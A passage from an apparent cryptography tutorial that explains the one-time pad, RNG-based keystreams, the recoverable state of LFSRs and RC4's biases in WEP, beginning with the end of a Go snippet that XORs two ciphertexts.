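	fmt.Printf("%x\n", xorBytes(ct1, ct2))
}
```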
If we had a unique random key as long as the message for each message we wanted
to encrypt, we could simply XOR them together to get the ciphertext, and it would be
a perfectly unbreakable encryption system. This construction is called the “one-time
pad” but is not widely used because securely communicating a key of the same length
as the message merely shifts the problem: now we have to solve the practical
concern of how to transport the key.
Therefore, instead of using XOR directly, we seed an RNG with a short “key” or
seed and then use the output of the RNG as our “keystream,” which we XOR with
the plaintext.
Linear-feedback shift registers (LFSRs) can be used as stream ciphers, but on their
own their internal state can easily be recovered by exploiting the linear na-
ture of their output (e.g., by using linear algebra).
RC4 is a widely used stream cipher that was employed insecurely by the first Wi-Fi
security standard (WEP), allowing an attacker to recover the Wi-Fi password just
by snooping on encrypted communications between genuine participants and then
using the statistical biases in RC4 to recover the original pre-shared key.

